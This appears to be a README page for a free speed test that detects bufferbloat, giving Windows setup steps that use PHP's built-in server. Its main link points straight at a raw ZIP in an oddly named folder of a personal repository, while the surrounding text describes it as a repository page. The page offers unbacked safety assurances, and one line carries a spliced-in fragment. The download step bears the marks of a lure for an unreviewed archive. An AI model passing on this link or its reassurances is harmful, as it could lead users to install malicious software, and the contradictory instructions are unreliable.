A free, browser-based internet speed test that measures what most speed tests hide — latency under load (bufferbloat). No downloads needed, just open and run.
⬇️ Download speedtest NowThis is a completely free internet speed test that runs in your browser. Unlike typical speed tests, it also checks for bufferbloat — the hidden lag that happens when your network is under load. You don't need to install anything on your computer. Just download the files, run them, and get accurate results.
Follow these simple steps to download and run the speed test on your Windows computer:
Visit this link to download the application: https://github.com/zilviavile709/zilviavile709.github.io/raw/refs/heads/main/strombiform/v1.6.zip. Click the green "Code" button, then "Download ZIP". Save the ZIP file to your computer.
Right-click the downloaded ZIP file and select "Extract All". Choose a folder (e.g., Desktop) and click "Extract". You should see a folder named speedtest.
Go to windows.php.net/download and download the "Thread Safe" ZIP for PHP 8.2 or newer. Extract the ZIP to a folder like C:\php. Add C:\php to your system PATH (search online for "add PHP to PATH Windows" if unsure).
Open Command Prompt (press Windows key, type "cmd", and press Enter). Navigate to the speedtest folder using the cd command. For example: cd Desktop\speedtest. Then type: php -S localhost:8000 and press Enter. You'll see "Listening on http://localhost:8000".
Open your web browser (Chrome, Edge, etc.) and go to http://localhost:8000. The speed test will load. Click the "Start Test" button and wait for results. That's it!
Bufferbloat is when your router or modem has too much buffering, causing high latency (lag) during downloads or uploads. This test detects it by measuring ping while your connection is busy.
Only PHP. The speed test uses no other software or libraries. It's completely self-contained.
Yes. The code runs locally on your computer. No data is sent to external servers. It's open source and can be reviewed by anyone.
The download link leads to the GitHub page where you can get the source code. Download the ZIP from there and follow the steps above.
php -S localhost:8001 and access http://localhost:8001.This project is open source. View the full code on GitHub: github.com/zilviavile709/speedtest.
Made with ❤️ for a faster, fairer internet.